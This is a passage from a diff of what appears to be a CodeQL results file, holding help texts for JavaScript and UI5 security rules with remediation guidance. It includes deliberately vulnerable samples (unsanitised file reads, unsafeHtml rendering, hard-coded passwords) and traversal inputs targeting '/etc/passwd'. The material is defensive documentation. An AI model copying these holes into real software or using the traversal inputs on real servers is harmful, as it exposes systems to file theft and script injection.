'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n", + "markdown" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\nIf the credentials are a placeholder value, make sure the value is obviously a placeholder by using a name such as `\"SampleToken\"` or `\"MyPassword\"`.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n" }, "properties" : { "tags" : [ "security", "external/cwe/cwe-259", "external/cwe/cwe-321", "external/cwe/cwe-798" ], @@ -1259,7 +1026,7 @@ "name" : "Client-side cross-site scripting", "precision" : "high", "problem.severity" : "error", - "security-severity" : "6.1" + "security-severity" : "7.8" } }, { "id" : "js/reflected-xss", @@ -1286,7 +1053,7 @@ "name" : "Reflected cross-site scripting", "precision" : "high", "problem.severity" : "error", - "security-severity" : "6.1" + "security-severity" : "7.8" } }, { "id" : "js/html-constructed-from-input", @@ -1340,7 +1107,7 @@ "name" : "Stored cross-site scripting", "precision" : "high", "problem.severity" : "error", - "security-severity" : "6.1" + "security-severity" : "7.8" } }, { "id" : "js/zipslip", @@ -1383,8 +1150,8 @@ "level" : "error" }, "help" : { - "text" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n", - "markdown" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n" + "text" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path.\n\nThe validation method you should use depends on whether you want to allow the user to specify complex paths with multiple components that may span multiple folders, or only simple filenames without a path component.\n\nIn the former case, a common strategy is to make sure that the constructed file path is contained within a safe root folder. First, normalize the path using `path.resolve` or `fs.realpathSync` to remove any \"..\" segments. You should always normalize the file path since an unnormalized path that starts with the root folder can still be used to access files outside the root folder. Then, after you have normalized the path, check that the path starts with the root folder.\n\nIn the latter case, you can use a library like the `sanitize-filename` npm package to eliminate any special characters from the file path. Note that it is *not* sufficient to only remove \"../\" sequences: for example, applying this filter to \".../...//\" would still result in the string \"../\".\n\nFinally, the simplest (but most restrictive) option is to use an allow list of safe patterns and make sure that the user input matches one of these patterns.\n\n\n## Example\nIn the first (bad) example, the code reads the file name from an HTTP request, then accesses that file within a root folder. A malicious user could enter a file name containing \"../\" segments to navigate outside the root folder and access sensitive files.\n\n\n```javascript\nconst fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n let filePath = url.parse(req.url, true).query.path;\n\n // BAD: This function uses unsanitized input that can read any file on the file system.\n res.write(fs.readFileSync(ROOT + filePath, 'utf8'));\n});\n```\nThe second (good) example shows how to avoid access to sensitive files by sanitizing the file path. First, the code resolves the file name relative to a root folder, normalizing the path and removing any \"../\" segments in the process. Then, the code calls `fs.realpathSync` to resolve any symbolic links in the path. Finally, the code checks that the normalized path starts with the path of the root folder, ensuring the file is contained within the root folder.\n\n\n```javascript\nconst fs = require('fs'),\n http = require('http'),\n path = require('path'),\n url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n let filePath = url.parse(req.url, true).query.path;\n\n // GOOD: Verify that the file path is under the root directory\n filePath = fs.realpathSync(path.resolve(ROOT, filePath));\n if (!filePath.startsWith(ROOT)) {\n res.statusCode = 403;\n res.end();\n return;\n }\n res.write(fs.readFileSync(filePath, 'utf8'));\n});\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n", + "markdown" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path.\n\nThe validation method you should use depends on whether you want to allow the user to specify complex paths with multiple components that may span multiple folders, or only simple filenames without a path component.\n\nIn the former case, a common strategy is to make sure that the constructed file path is contained within a safe root folder. First, normalize the path using `path.resolve` or `fs.realpathSync` to remove any \"..\" segments. You should always normalize the file path since an unnormalized path that starts with the root folder can still be used to access files outside the root folder. Then, after you have normalized the path, check that the path starts with the root folder.\n\nIn the latter case, you can use a library like the `sanitize-filename` npm package to eliminate any special characters from the file path. Note that it is *not* sufficient to only remove \"../\" sequences: for example, applying this filter to \".../...//\" would still result in the string \"../\".\n\nFinally, the simplest (but most restrictive) option is to use an allow list of safe patterns and make sure that the user input matches one of these patterns.\n\n\n## Example\nIn the first (bad) example, the code reads the file name from an HTTP request, then accesses that file within a root folder. A malicious user could enter a file name containing \"../\" segments to navigate outside the root folder and access sensitive files.\n\n\n```javascript\nconst fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n let filePath = url.parse(req.url, true).query.path;\n\n // BAD: This function uses unsanitized input that can read any file on the file system.\n res.write(fs.readFileSync(ROOT + filePath, 'utf8'));\n});\n```\nThe second (good) example shows how to avoid access to sensitive files by sanitizing the file path. First, the code resolves the file name relative to a root folder, normalizing the path and removing any \"../\" segments in the process. Then, the code calls `fs.realpathSync` to resolve any symbolic links in the path. Finally, the code checks that the normalized path starts with the path of the root folder, ensuring the file is contained within the root folder.\n\n\n```javascript\nconst fs = require('fs'),\n http = require('http'),\n path = require('path'),\n url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n let filePath = url.parse(req.url, true).query.path;\n\n // GOOD: Verify that the file path is under the root directory\n filePath = fs.realpathSync(path.resolve(ROOT, filePath));\n if (!filePath.startsWith(ROOT)) {\n res.statusCode = 403;\n res.end();\n return;\n }\n res.write(fs.readFileSync(filePath, 'utf8'));\n});\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n" }, "properties" : { "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-023", "external/cwe/cwe-036", "external/cwe/cwe-073", "external/cwe/cwe-099" ], @@ -2555,34 +2322,7 @@ "name" : "Replacement of a substring with itself", "precision" : "very-high", "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/unsafe-external-link", - "name" : "js/unsafe-external-link", - "shortDescription" : { - "text" : "Potentially unsafe external link" - }, - "fullDescription" : { - "text" : "External links that open in a new tab or window but do not specify link type 'noopener' or 'noreferrer' are a potential security risk." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n", - "markdown" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n" - }, - "properties" : { - "tags" : [ "maintainability", "security", "external/cwe/cwe-200", "external/cwe/cwe-1022" ], - "description" : "External links that open in a new tab or window but do not specify\n link type 'noopener' or 'noreferrer' are a potential security risk.", - "id" : "js/unsafe-external-link", - "kind" : "problem", - "name" : "Potentially unsafe external link", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "6.5" + "security-severity" : "5.0" } }, { "id" : "js/regex/missing-regexp-anchor", @@ -2825,7 +2565,7 @@ "name" : "Log injection", "precision" : "medium", "problem.severity" : "error", - "security-severity" : "7.8" + "security-severity" : "6.1" } }, { "id" : "js/password-in-configuration-file", @@ -3056,7 +2796,7 @@ "enabled" : true }, "properties" : { - "tags" : [ "summary" ], + "tags" : [ "summary", "telemetry" ], "description" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments.", "id" : "js/summary/lines-of-code", "kind" : "metric", @@ -3075,7 +2815,7 @@ "enabled" : true }, "properties" : { - "tags" : [ "summary", "lines-of-code" ], + "tags" : [ "summary", "lines-of-code", "debug" ], "description" : "The total number of lines of JavaScript and TypeScript code from the source code directory,\n excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding\n whitespace or comments.", "id" : "js/summary/lines-of-user-code", "kind" : "metric", @@ -3083,16 +2823,252 @@ } } ], "locations" : [ { - "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/", + "uri" : "file:///opt/hostedtoolcache/CodeQL/2.17.3/x64/codeql/qlpacks/codeql/javascript-queries/0.8.16/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///opt/hostedtoolcache/CodeQL/2.17.3/x64/codeql/qlpacks/codeql/javascript-queries/0.8.16/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + }, { + "name" : "advanced-security/javascript-sap-ui5-queries", + "semanticVersion" : "0.6.0+98e19b0e301f4a2867e6a5c7d8351765387cf40c", + "rules" : [ { + "id" : "js/ui5-xss", + "name" : "js/ui5-xss", + "shortDescription" : { + "text" : "UI5 Client-side cross-site scripting" + }, + "fullDescription" : { + "text" : "Writing user input directly to a UI5 View allows for a cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Writing user input directly to a UI5 View allows for\n a cross-site scripting vulnerability.", + "id" : "js/ui5-xss", + "kind" : "path-problem", + "name" : "UI5 Client-side cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/ui5-clickjacking", + "name" : "js/ui5-clickjacking", + "shortDescription" : { + "text" : "UI5 Clickjacking" + }, + "fullDescription" : { + "text" : "The absence of frame options allows for clickjacking." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n", + "markdown" : "# 